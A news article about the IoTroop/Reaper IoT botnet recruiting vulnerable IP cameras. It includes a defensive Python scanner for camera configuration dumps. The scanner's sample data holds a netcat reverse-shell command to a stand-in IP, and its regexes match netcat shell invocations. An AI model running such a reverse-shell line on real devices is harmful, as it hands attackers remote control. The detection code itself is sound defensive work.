Cyber clouds are now gathering for what looks to be a major new storm. Fresh on the heels of the Mirai botnet that launched massive DDoS attacks across the internet last year, a new IoT botnet has been spotted that could be even more damaging.
Check Point researchers have recently uncovered the botnet and named it IoTroop. IoT stands for Internet of Things and refers to the growing number of internet-connected smart devices that aren’t traditional computing devices – say, a sprinkler system that can be managed remotely or a smart garage controller. IoT botnets are damaging in large part due to the sheer number of these devices, many of which still have default usernames and passwords.
That was certainly made evident when Mirai struck in 2016. By launching an attack on DNS service provider Dyn, Mirai was able to disrupt accessibility for popular sites such as GitHub, Twitter, Netflix, Reddit and Airbnb.
Check Point’s Intrusion Prevention System first detected the botnet in late September. It has been seen evolving to exploit known vulnerabilities in wireless IP cameras by manufacturers TP-Link, GoAhead, D-Link, Linksys, AVTECH, NETGEAR, MikroTik and more. Even scarier, the attack itself was being carried out by previously compromised IoT devices.
From analyzing one infected node, researchers were able to get a glimpse of how the attack is carried out. They found a GoAhead camera with an open Port 81 over TCP. The System.ini file that contains the device’s configuration was modified with a ‘Netcat’ command that opened up a shell to the attacker’s IP.
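A defender who has pulled a configuration dump off a camera can check it for the indicator described above. This is an added example, not code from Check Point or Netlab 360; the dump layout and all sample bytes are constructed, and `scan_config` is a hypothetical helper name.

```python
import re

# Runs of 4+ printable ASCII bytes, like the `strings` utility; embedded
# config dumps often mix binary fields with text.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Netcat under its common names, matched as a whole word only.
NETCAT = re.compile(r"(?<![\w.-])(?:nc|ncat|netcat)(?![\w.-])")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# -e / -c attach a program (typically a shell) to the connection.
EXEC_FLAG = re.compile(r"(?<!\S)-[ec]\b")

def scan_config(blob: bytes) -> list:
    """Return one finding per printable string that invokes netcat."""
    findings = []
    for m in PRINTABLE.finditer(blob):
        text = m.group().decode("ascii")
        if NETCAT.search(text):
            findings.append({
                "offset": m.start(),
                "text": text,
                "remote_ips": IPV4.findall(text),
                "spawns_shell": bool(EXEC_FLAG.search(text)),
            })
    return findings

# Constructed sample dumps (not captured from a real device).
CLEAN = b"\x00\x01admin\x00\x00ntp=time.example.org\x00sync_interval=60\x00port=81\x00"
INFECTED = CLEAN + b"\x02\x00nc 203.0.113.7 8888 -e /bin/sh\x00\xff"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("infected", INFECTED)):
        for f in scan_config(blob):
            print(f"{name}: offset {f['offset']}: {f['text']!r} "
                  f"ips={f['remote_ips']} shell={f['spawns_shell']}")
```

Any finding with `spawns_shell` set and a remote IP is worth treating as a compromise indicator and comparing against a known-good copy of the device configuration.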
There are no predictions of when the attack will come; what we are seeing right now is the botnet’s recruitment stage, ahead of a huge attack that will inevitably follow.
Netlab 360, which dubbed the botnet “Reaper”, states that the malware was designed to propagate more stealthily than Mirai. As of now they recommend using Netlab’s security advisory for Reaper to find vendor patches.